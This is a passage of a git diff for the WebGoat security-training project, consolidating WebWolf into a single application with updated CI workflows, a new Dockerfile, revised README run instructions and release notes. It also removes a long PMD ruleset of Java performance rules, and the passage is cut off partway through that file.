 delete mode 100644 webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/nl/IntroductionWebWolf.adoc
 delete mode 100644 webgoat-lessons/xxe/pom.xml
 delete mode 100644 webgoat-server/Dockerfile
 delete mode 100644 webgoat-server/pom.xml
 delete mode 100644 webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java
 delete mode 100644 webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
 delete mode 100644 webwolf/Dockerfile
 delete mode 100644 webwolf/README.md
 delete mode 100644 webwolf/pom.xml
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/WebWolf.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/ActuatorDsJsonParser.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/DataSourceProperties.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/DataSourceResolver.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/db/ResourceUnavailableException.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/user/RegistrationController.java
 delete mode 100644 webwolf/src/main/java/org/owasp/webwolf/user/UserValidator.java
 delete mode 100644 webwolf/src/main/resources/i18n/messages.properties
 delete mode 100644 webwolf/src/test/java/org/owasp/webwolf/user/UserValidatorTest.java
 delete mode 100644 webwolf/src/test/resources/logback-test.xml
 delete mode 100755 webwolf/start-webwolf.sh

diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 000000000..35b2f7ce0
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,3 @@
+**
+
+!/target
diff --git a/.editorconfig b/.editorconfig
index 8140db745..a6d05ec21 100644
--- a/.editorconfig
+++ b/.editorconfig
@@ -12,5 +12,4 @@ ij_continuation_indent_size = 8
 ij_formatter_off_tag = @formatter:off
 ij_formatter_on_tag = @formatter:on
 ij_formatter_tags_enabled = false
-ij_wrap_on_typing = true
 ij_java_names_count_to_use_import_on_demand = 999
diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
deleted file mode 100644
index 0174d81d4..000000000
--- a/.github/workflows/branch_build.yml
+++ /dev/null
@@ -1,57 +0,0 @@
-name: "Branch build"
-on:
-  push:
-    branches-ignore:
-      - main
-      - develop
-      - release/*
-permissions:
-  contents: read
-
-jobs:
-  install-notest:
-    if: "github.repository != 'WebGoat/WebGoat'"
-    runs-on: ubuntu-latest
-    name: "Package and linting"
-    steps:
-      - uses: actions/checkout@v3
-      - name: set up JDK 17
-        uses: actions/setup-java@v2
-        with:
-          distribution: 'temurin'
-          java-version: 17
-          architecture: x64
-      - name: Cache Maven packages
-        uses: actions/cache@v3
-        with:
-          path: ~/.m2
-          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
-          restore-keys: ubuntu-latest-m2
-      - name: Test with Maven
-        run: mvn --no-transfer-progress install -DskipTests
-
-  testing:
-    if: "github.repository != 'WebGoat/WebGoat'"
-    needs: install-notest
-    runs-on: ubuntu-latest
-    strategy:
-      matrix:
-        args:
-          - mvn --no-transfer-progress -pl '!webgoat-integration-tests' test
-          - mvn --no-transfer-progress -pl webgoat-integration-tests test
-    steps:
-      - uses: actions/checkout@v3
-      - name: set up JDK 17
-        uses: actions/setup-java@v2
-        with:
-          distribution: 'temurin'
-          java-version: 17
-          architecture: x64
-      - name: Cache Maven packages
-        uses: actions/cache@v3
-        with:
-          path: ~/.m2
-          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
-          restore-keys: ubuntu-latest-m2
-      - name: Test with Maven
-        run: ${{ matrix.args }}
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
new file mode 100644
index 000000000..97d830774
--- /dev/null
+++ b/.github/workflows/build.yml
@@ -0,0 +1,72 @@
+name: "Build"
+on:
+  pull_request:
+    paths-ignore:
+      - '.txt'
+      - '*.MD'
+      - '*.md'
+      - 'LICENSE'
+      - 'docs/**'
+  push:
+    branches:
+      - main
+      - develop
+      - release/*
+    tags-ignore:
+      - '*'
+    paths-ignore:
+      - '.txt'
+      - '*.MD'
+      - '*.md'
+      - 'LICENSE'
+      - 'docs/**'
+
+jobs:
+  pr-build:
+    if: >
+      github.event_name == 'pull_request' && !github.event.pull_request.draft && (
+        github.event.action == 'opened' ||
+        github.event.action == 'reopened' ||
+        github.event.action == 'synchronize' 
+      )
+    runs-on: ${{ matrix.os }}
+    strategy:
+      matrix:
+        os: [ubuntu-latest, windows-latest, macos-latest]
+    steps:
+      - uses: actions/checkout@v2
+      - name: Set up JDK 17
+        uses: actions/setup-java@v2
+        with:
+          distribution: 'temurin'
+          java-version: 17
+          architecture: x64
+      - name: Cache Maven packages
+        uses: actions/cache@v2.1.7
+        with:
+          path: ~/.m2
+          key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
+          restore-keys: ${{ runner.os }}-m2-
+      - name: Build with Maven
+        run: mvn --no-transfer-progress package
+
+  build:
+    if: github.repository == 'WebGoat/WebGoat' && github.event_name == 'push'
+    runs-on: ubuntu-latest
+    name: "Branch build"
+    steps:
+        - uses: actions/checkout@v2
+        - name: set up JDK 17
+          uses: actions/setup-java@v2
+          with:
+              distribution: 'temurin'
+              java-version: 17
+              architecture: x64
+        - name: Cache Maven packages
+          uses: actions/cache@v2.1.7
+          with:
+              path: ~/.m2
+              key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+              restore-keys: ubuntu-latest-m2-
+        - name: Test with Maven
+          run: mvn --no-transfer-progress verify
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
deleted file mode 100644
index bfd0d43ea..000000000
--- a/.github/workflows/pr_build.yml
+++ /dev/null
@@ -1,48 +0,0 @@
-name: "Pull request build"
-on:
-  pull_request:
-    paths-ignore:
-      - '.txt'
-      - '*.MD'
-      - '*.md'
-      - 'LICENSE'
-      - 'docs/**'
-  push:
-    branches:
-      - main
-      - release/*
-    tags-ignore:
-      - '*'
-    paths-ignore:
-      - '.txt'
-      - '*.MD'
-      - '*.md'
-      - 'LICENSE'
-      - 'docs/**'
-
-permissions:
-  contents: read
-
-jobs:
-  build:
-    runs-on: ${{ matrix.os }}
-    strategy:
-      matrix:
-        os: [ubuntu-latest, windows-latest, macos-latest]
-        java: [17]
-    steps:
-      - uses: actions/checkout@v3
-      - name: Set up JDK ${{ matrix.java }}
-        uses: actions/setup-java@v2
-        with:
-          distribution: 'temurin'
-          java-version: ${{ matrix.java }}
-          architecture: x64
-      - name: Cache Maven packages
-        uses: actions/cache@v3
-        with:
-          path: ~/.m2
-          key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
-          restore-keys: ${{ runner.os }}-m2
-      - name: Build with Maven
-        run: mvn --no-transfer-progress package
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 7f73a10fa..15bd307b8 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -46,8 +46,7 @@ jobs:
         with:
           draft: false
           files: |
-            webgoat-server/target/webgoat-server-${{ env.WEBGOAT_MAVEN_VERSION }}.jar
-            webwolf/target/webwolf-${{ env.WEBGOAT_MAVEN_VERSION }}.jar
+            webgoat/target/webgoat-${{ env.WEBGOAT_MAVEN_VERSION }}.jar
           body: |
             ## Version ${{ steps.tag.outputs.tag }}
 
@@ -91,13 +90,13 @@ jobs:
       - name: "Build and push"
         uses: docker/build-push-action@v2.10.0
         with:
-          context: ./docker
-          file: docker/Dockerfile
+          context: ./
+          file: ./Dockerfile
           push: true 
           platforms: linux/amd64, linux/arm64, linux/arm/v7
           tags: |
-            webgoat/goatandwolf:${{ env.WEBGOAT_TAG_VERSION }}
-            webgoat/goatandwolf:latest
+            webgoat/webgoat:${{ env.WEBGOAT_TAG_VERSION }}
+            webgoat/webgoat:latest
           build-args: |
             webgoat_version=${{ env.WEBGOAT_MAVEN_VERSION }}
 
@@ -118,10 +117,10 @@ jobs:
           ref: develop
           token: ${{ secrets.WEBGOAT_DEPLOYER_TOKEN }}
 
-      - name: Set up JDK 15
+      - name: Set up JDK 17
         uses: actions/setup-java@v2
         with:
-          java-version: 15
+          java-version: 17
           architecture: x64
 
       - name: Set version to next snapshot
diff --git a/Dockerfile b/Dockerfile
new file mode 100644
index 000000000..bd9c7b58d
--- /dev/null
+++ b/Dockerfile
@@ -0,0 +1,32 @@
+FROM docker.io/eclipse-temurin:17-jdk-focal
+
+RUN useradd -ms /bin/bash webgoat
+RUN chgrp -R 0 /home/webgoat
+RUN chmod -R g=u /home/webgoat
+
+USER webgoat
+
+COPY --chown=webgoat target/webgoat-*.jar /home/webgoat/webgoat.jar
+
+EXPOSE 8080
+EXPOSE 9090
+
+WORKDIR /home/webgoat
+ENTRYPOINT [ "java", \
+   "-Duser.home=/home/webgoat", \
+   "-Dfile.encoding=UTF-8", \
+   "--add-opens", "java.base/java.lang=ALL-UNNAMED", \
+   "--add-opens", "java.base/java.util=ALL-UNNAMED", \
+   "--add-opens", "java.base/java.lang.reflect=ALL-UNNAMED", \
+   "--add-opens", "java.base/java.text=ALL-UNNAMED", \
+   "--add-opens", "java.desktop/java.beans=ALL-UNNAMED", \
+   "--add-opens", "java.desktop/java.awt.font=ALL-UNNAMED", \
+   "--add-opens", "java.base/sun.nio.ch=ALL-UNNAMED", \
+   "--add-opens", "java.base/java.io=ALL-UNNAMED", \
+   "--add-opens", "java.base/java.util=ALL-UNNAMED", \
+   "-Drunning.in.docker=true", \
+   "-Dwebgoat.host=0.0.0.0", \
+   "-Dwebwolf.host=0.0.0.0", \
+   "-Dwebgoat.port=8080", \
+   "-Dwebwolf.port=9090", \
+   "-jar", "webgoat.jar" ]
diff --git a/README.md b/README.md
index dc49f8363..8ff92be96 100644
--- a/README.md
+++ b/README.md
@@ -33,21 +33,15 @@ For more details check [the Contribution guide](/CONTRIBUTING.md)
 
 ## 1. Run using Docker
 
-Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/goatandwolf).
+Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/webgoat).
 
 The easiest way to start WebGoat as a Docker container is to use the all-in-one docker container. This is a docker image that has WebGoat and WebWolf running inside.
 
 ```shell
 
-docker run -it -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:v8.2.2
+docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/webgoat
 ```
 
-The landing page will be located at: http://localhost  
-WebGoat will be located at: http://localhost:8080/WebGoat  
-WebWolf will be located at: http://localhost:9090/WebWolf
-
-**Important**: *Change the ports if necessary, for example use `127.0.0.1:7777:9090` to map WebWolf to `http://localhost:7777/WebGoat`*  
-
 **Important**: *Choose the correct timezone, so that the docker container and your host are in the same timezone. As it is important for the validity of JWT tokens used in certain exercises.*
 
 
@@ -56,12 +50,10 @@ WebWolf will be located at: http://localhost:9090/WebWolf
 Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -Dserver.port=8080 -Dserver.address=localhost -Dhsqldb.port=9001 -jar webgoat-server-8.2.2.jar 
-java -Dfile.encoding=UTF-8 -Dserver.port=9090 -Dserver.address=localhost -jar webwolf-8.2.2.jar
+java -Dfile.encoding=UTF-8 -jar webgoat-8.2.3.jar 
 ```
 
-WebGoat will be located at: http://localhost:8080/WebGoat and   
-WebWolf will be located at: http://localhost:9090/WebWolf (change ports if necessary)
+Click the link in the log to start WebGoat.
 
 ## 3. Run from the sources
 
@@ -84,17 +76,21 @@ cd WebGoat
 git checkout <<branch_name>>
 # On Linux/Mac:
 ./mvnw clean install 
+
 # On Windows:
 ./mvnw.cmd clean install
+
+# Using docker or podman, you can than build the container locally
+docker build -f Dockerfile . -t webgoat/webgoat
 ```
 
 Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 
 ```Shell
 # On Linux/Mac:
-./mvnw -pl webgoat-server spring-boot:run
-# On Widows:
-./mvnw.cmd -pl webgoat-server spring-boot:run
+./mvnw spring-boot:run
+# On Windows:
+./mvnw.cmd spring-boot:run
 
 ```
 ... you should be running WebGoat on localhost:8080/WebGoat momentarily
@@ -114,9 +110,9 @@ For instance running as a jar on a Linux/macOS it will look like this:
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
-java -jar webgoat-server/target/webgoat-server-v8.2.2-SNAPSHOT.jar
-```
+java -jar target/webgoat-8.2.3-SNAPSHOT.jar
+
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
 ```Shell
-docker run -d -p 80:8888 -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/goatandwolf
+docker run -d -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/webgoat
 ```
diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index 3fbab978a..ef55b382d 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -4,7 +4,21 @@
 
 ### New functionality
 
-- Update the Docker startup script, it is now possible to pass `skip-nginx` or set `SKIP_NGINX` as environment variable.
+- New year's resolution: major refactoring of WebGoat to simplify the setup and improve building times.
+- Move away from multi-project setup:
+  - This has a huge performance benefit when building the application. Build time locally is now `Total time:  42.469 s` (depends on your local machine of course)
+  - No longer add Maven dependencies in several places
+  - H2 no longer needs to run as separate process, which solves the issue of WebWolf sharing and needing to configure the correct database connection.
+- More explicit paths in html files to reference `adoc` files, less magic.
+- Integrate WebWolf in WebGoat, the setup was way too complicated and needed configuration which could lead to mistakes and a not working application. This also simplifies the Docker configuration as there is only 1 Docker image.
+- Add WebWolf button in WebGoat
+- Move all lessons into `src/main/resources` 
+- WebGoat selects a port dynamically when starting. It will still start of port 8080 it will try another port to ease the user experience. 
+- WebGoat logs URL after startup: `Please browse to http://127.0.0.1:8080/WebGoat to get started...`
+- Simplify `Dockerfile` as we no longer need a script to start everything
+- Maven build now start WebGoat jar with Maven plugin to make sure we run against the latest build.
+- Added `Initializable` interface for a lesson, an assignment can implement this interface to set it up for a specific user and to reset the assignment back to its original state when a reset lesson occurs. See `BlindSendFileAssignment` for an example.
+- Integration tests now use the same user. This saves a lot of time as before every test used a different user which triggered the Flyway migration to set up the database schema for the user. This migration took a lot of time.
 
 ## Version 8.2.2
 
diff --git a/config/pmd/pmd-ruleset.xml b/config/pmd/pmd-ruleset.xml
deleted file mode 100644
index 27812d9bc..000000000
--- a/config/pmd/pmd-ruleset.xml
+++ /dev/null
@@ -1,1746 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<ruleset name="jpinpoint-rules" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pmd.sourceforge.net/ruleset/2.0.0 http://pmd.sourceforge.net/ruleset_2_0_0.xsd" xmlns="http://pmd.sourceforge.net/ruleset/2.0.0" xmlns:fn="http://www.w3.org/TR/xpath-functions/">
-<description>jPinpoint specific rules for performance aware Java coding, sponsored by Rabobank.(jpinpoint-rules)</description>
-
-<!-- IMPORTANT NOTICE: The content of this file is generated. Do not edit this file directly since changes may be lost when this file is regenerated! -->
-
-<!-- BEGIN Included file 'common.xml' -->
-    <rule name="AvoidCDIReferenceLeak"
-          language="java"
-          message="Explicit CDI references need to be destroyed otherwise they leak."
-          class="net.sourceforge.pmd.lang.rule.XPathRule"
-          typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/pmd_rules_performance.html#AvoidCDIReferenceLeak">
-        <description>Problem: A proxy object is created by CDI for explicit references, they are not de-referenced implicitly and become a memory leak. &#13;
-            Solution: Destroy the reference explicitly.
-        (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//Expression/PrimaryExpression/PrimaryPrefix/Name[@Image='CDI.current']/../../
-PrimarySuffix[@Image = 'select'
-and not
-(ancestor::MethodDeclaration//TryStatement/FinallyStatement//PrimaryExpression[
-PrimaryPrefix/Name/@Image='CDI.current'][PrimarySuffix/@Image = 'destroy']
-[PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name/@Image =
-ancestor::MethodDeclaration//Expression/PrimaryExpression/PrimaryPrefix/Name[@Image='CDI.current']/../../
-PrimarySuffix[@Image = 'select']/ancestor::StatementExpression/PrimaryExpression/PrimaryPrefix/Name/@Image
-])
-and not
-(ancestor::MethodDeclaration//TryStatement/FinallyStatement//PrimaryExpression[
-PrimaryPrefix/Name/@Image='CDI.current'][PrimarySuffix/@Image = 'destroy']
-[PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name/@Image =
-ancestor::MethodDeclaration//VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Name[@Image='CDI.current']/../../
-PrimarySuffix[@Image = 'select']/ancestor::VariableDeclarator/VariableDeclaratorId/@Image
-])]
-]]></value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-public class CDIStuff {
-
-	private void bad() {
-		MyClass o = CDI.current().select(MyClass.class).get();
-		o.doStuff();
-	    // bad - missing destroy in finally
-	}
-
-	private void good() {
-		MyClass o = CDI.current().select(MyClass.class).get();
-		try {
-			o.doStuff();
-		} finally {
-			CDI.current().destroy(o); // good - destroy properly
-		}
-	}
-}
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidConstantsInInterface" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Interface defines constants. It may expose implementation details." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-VOEDOS04">
-        <description>Interface defines constants. Problem: Possibly exposes implementation details.  &#13;
-            Solution: Make it a Class which cannot be instantiated, or an Enum. Use static imports.
-            (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
- //ClassOrInterfaceDeclaration[@Interface='true']
-    [
-      count(.//FieldDeclaration)>0
-    ]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidDecimalAndChoiceFormatAsField" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false"
-          dfa="false" language="java"
-          message="Avoid using DecimalFormat or ChoiceFormat as field since it is thread-unsafe."
-          typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IDTF01">
-        <description>Problem: java.text.DecimalFormat and java.text.ChoiceFormat are thread-unsafe. The usual solution
-            is to create a new local one when needed in a method.
-        (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//FieldDeclaration/VariableDeclarator/VariableInitializer/Expression[typeIs('java.text.DecimalFormat') or typeIs('java.text.ChoiceFormat')]
-        ]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidDeprecatedHttpConnectors" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Avoid the use of deprecated/thread-unsafe HTTP connectors" typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IBI06" >
-        <description>Problem: Several HTTP client connection managers are thread-unsafe which may cause session data mix-up or have other issues for which they were made deprecated.&#13;
-            Solutions: Use org.apache.http.impl.conn.PoolingHttpClientConnectionManager and org.apache.http.impl.client.HttpClientBuilder. (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//ImportDeclaration/Name[@Image='org.apache.commons.httpclient.SimpleHttpConnectionManager'
-or @Image='org.apache.http.conn.ClientConnectionManager'
-or @Image='org.apache.http.impl.conn.PoolingClientConnectionManager'
-or @Image='org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager'
-or @Image='org.apache.http.impl.conn.SingleClientConnManager'
-or @Image='org.apache.http.impl.client.DefaultHttpClient'
-or @Image='org.apache.http.impl.client.SystemDefaultHttpClient'
-or @Image='org.apache.http.conn.ClientConnectionManager'
-]
-|
-//TypeDeclaration//ClassOrInterfaceDeclaration//ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/
-Type/ReferenceType/ClassOrInterfaceType[typeIs('org.apache.commons.httpclient.SimpleHttpConnectionManager')
-or typeIs('org.apache.http.conn.ClientConnectionManager')
-or typeIs('org.apache.http.impl.conn.PoolingClientConnectionManager')
-or typeIs('org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager')
-or typeIs('org.apache.http.impl.conn.SingleClientConnManager')
-or typeIs('org.apache.http.impl.client.DefaultHttpClient')
-or typeIs('org.apache.http.impl.client.SystemDefaultHttpClient')
-or typeIs('org.apache.http.conn.ClientConnectionManager')
-]
-|
-//TypeDeclaration//ClassOrInterfaceDeclaration//ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/
-VariableDeclarator/VariableInitializer/Expression//AllocationExpression/ClassOrInterfaceType[
-typeIs('org.apache.http.conn.ClientConnectionManager')
-or typeIs('org.apache.http.impl.conn.PoolingClientConnectionManager')
-or typeIs('org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager')
-or typeIs('org.apache.http.impl.conn.SingleClientConnManager')
-or typeIs('org.apache.http.impl.client.DefaultHttpClient')
-or typeIs('org.apache.http.impl.client.SystemDefaultHttpClient')
-or typeIs('org.apache.http.conn.ClientConnectionManager')
-]
-|
-//AllocationExpression/ClassOrInterfaceType[typeIs('org.apache.commons.httpclient.SimpleHttpConnectionManager')]
-		     ]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidDuplicateAssignmentsInCases"
-          message="Avoid duplicate assignments in different switch cases"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Quality#JavaCodeQuality-CSC01">
-        <description>
-            Problem: Potential bug: expected are different assignments in different cases.&#13;
-            Solution: assign different values in different cases, common assignments should be taken out of the switch.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//SwitchStatement/BlockStatement[
-(.//AssignmentOperator/../../..//StatementExpression/Expression/PrimaryExpression/PrimaryPrefix/Name/@Image
-=preceding-sibling::SwitchLabel/preceding-sibling::BlockStatement//AssignmentOperator/../../..//StatementExpression/Expression/PrimaryExpression/PrimaryPrefix/Name/@Image
-or
-.//AssignmentOperator/../../..//StatementExpression/Expression/PrimaryExpression/PrimaryPrefix//Literal/@Image
-=preceding-sibling::SwitchLabel/preceding-sibling::BlockStatement//AssignmentOperator/../../..//StatementExpression/Expression/PrimaryExpression/PrimaryPrefix//Literal/@Image)
-and
-.//AssignmentOperator/../../..//StatementExpression/PrimaryExpression/PrimaryPrefix/Name/@Image
-=preceding-sibling::SwitchLabel/preceding-sibling::BlockStatement//AssignmentOperator/../../..//StatementExpression/PrimaryExpression/PrimaryPrefix/Name/@Image
-and
-not(.//AssignmentOperator/../../..//StatementExpression/Expression/PrimaryExpression/PrimarySuffix/Arguments/@ArgumentCount > 0
-or preceding-sibling::SwitchLabel[@Default='true'])
-]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="AvoidImplicitlyRecompilingRegex" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="String regex method, Pattern.matches or FileSystem.getPathMatcher is used.
-	   Implicitely compiles a regex pattern, can be expensive." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-IREU01">
-        <description>A regular expression is compiled implicitely on every invocation. Problem: this can be expensive, depending on the length of the regular expression.&#13;
-            Solution: Compile the regex pattern only once and assign it to a private static final Pattern field. java.util.Pattern objects are thread-safe so they can be shared among threads.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-(//MethodDeclaration//PrimaryPrefix/Name[ends-with(@Image, '.replaceAll') or ends-with(@Image, '.replaceFirst') or ends-with(@Image, 'Pattern.matches')]/../../PrimarySuffix/Arguments[@ArgumentCount=2]//Expression[1]//PrimaryPrefix[
-Literal[string-length(@Image) > 5 and
-(matches(@Image, '[\.\$\|\(\)\[\]\{\}\^\?\*\+\\]+'))] or Name
-and not(../PrimarySuffix)
-and not (
-Name/@Image=ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-and not (
-Name[@Image=ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/VariableDeclarator[
-VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Literal[string-length(@Image) < 6 or not
-(matches(@Image, '[\.\$\|\(\)\[\]\{\}\^\?\*\+\\]+'))]
-]/VariableDeclaratorId/@Image])
-]
-,
-//MethodDeclaration//PrimaryPrefix/Name[ends-with(@Image, '.split') or ends-with(@Image, 'getPathMatcher')]/../../PrimarySuffix/Arguments[@ArgumentCount=1]//Expression[1]//PrimaryPrefix[
-Literal[string-length(@Image) > 5 and
-matches(@Image, '[\.\$\|\(\)\[\]\{\}\^\?\*\+\\]+')] or Name
-and not(../PrimarySuffix)
-and not (
-Name/@Image=ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-and not (
-Name[@Image=ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/VariableDeclarator[
-VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Literal[string-length(@Image) < 6 or not
-(matches(@Image, '[\.\$\|\(\)\[\]\{\}\^\?\*\+\\]+'))]
-]/VariableDeclaratorId/@Image])
-]
-,
-//MethodDeclaration//PrimarySuffix[@Image='getPathMatcher']/../PrimarySuffix/Arguments[@ArgumentCount=1]/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix[
-Literal[string-length(@Image) > 5] or Name
-and not(../PrimarySuffix)
-and not (
-Name/@Image=ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-and not (
-Name[@Image=ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/VariableDeclarator[
-VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Literal[string-length(@Image) < 6]]/VariableDeclaratorId/@Image])
-]
-,
-(: --- String.matches called on formalparams, locals and fields --- :)
-//MethodDeclaration//PrimaryPrefix/Name[ends-with(@Image, '.matches')]
-[
-(exists(index-of((ancestor::MethodDeclaration//FormalParameter[pmd-java:typeIs('java.lang.String')]/VariableDeclaratorId/@Image), substring-before(@Image,'.')))
-or
-exists(index-of((ancestor::MethodDeclaration//LocalVariableDeclaration/Type[pmd-java:typeIs('java.lang.String')]/../VariableDeclarator/VariableDeclaratorId/@Image), substring-before(@Image,'.')))
-or
-exists(index-of((ancestor::ClassOrInterfaceBody//FieldDeclaration[pmd-java:typeIs('java.lang.String')]/VariableDeclarator/VariableDeclaratorId/@Image), substring-before(@Image,'.'))))
-and
-(: for matches param is >5 literal or something named :)
-../../PrimarySuffix/Arguments[@ArgumentCount=1]//Expression[1]//PrimaryPrefix[
-Literal[string-length(@Image) > 5] or Name
-(: exclude method calls :)
-and not(../PrimarySuffix)
-(: exclude for param is method arg or local :)
-and not (
-Name/@Image=ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-(: exclude for param is short fields :)
-and not (
-Name[@Image=ancestor::ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration/VariableDeclarator[
-VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Literal[string-length(@Image) < 6]
-]/VariableDeclaratorId/@Image])
-]])
-]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidInMemoryStreamingDefaultConstructor" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Default capacity constructor of ByteArrayOutputStream or StringWriter is used, it usually needs expensive expansions." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-ISIO01">
-        <description>Default constructor of ByteArrayOutputStream or StringWriter is used. Problem: It allocates a small buffer as capacity which usually needs several expensive expansions.&#13;
-            Solution: Presize the ByteArrayOutputStream or StringWriter with an initial capacity such that an expansion is not needed in most cases.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-	//TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration
-//PrimaryExpression/PrimaryPrefix/AllocationExpression/ClassOrInterfaceType[typeIs('java.io.ByteArrayOutputStream') or typeIs('java.io.StringWriter')]
-[not(../Arguments/ArgumentList)]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
